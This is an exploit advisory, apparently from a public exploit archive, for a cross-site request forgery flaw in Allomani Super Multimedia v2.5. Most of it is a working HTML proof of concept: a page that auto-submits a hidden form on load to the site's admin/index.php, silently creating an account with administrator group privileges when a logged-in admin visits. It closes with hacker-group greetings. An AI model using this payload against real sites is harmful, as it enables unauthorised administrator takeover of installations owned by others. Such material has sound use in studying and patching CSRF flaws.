# Exploit Title: Allomani - Super Multimedia v2.5 - [CSRF] Add Admin Account # Date: 29-06-2010 # Author: G0D-F4Th3r # Software Link: http://allomani.com # Version: 2.5 #################################################### <html> <body onload="javascript:fireForms()"> <form method="POST" name="form0" action=" http://www.site.com/[path]/admin/index.php"> <input type="hidden" name="action" value="adduserok"/> <input type="hidden" name="username" value="test"/> <input type="hidden" name="password" value="test"/> <input type="hidden" name="email" value="test@test.com"/> <input type="hidden" name="group_id" value="1"/> <input type="hidden" name="useraddbutton" value="اضافة"/> </form> </body> </html> ################################################################################## Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My Friends ##################################################################################
体验盒子
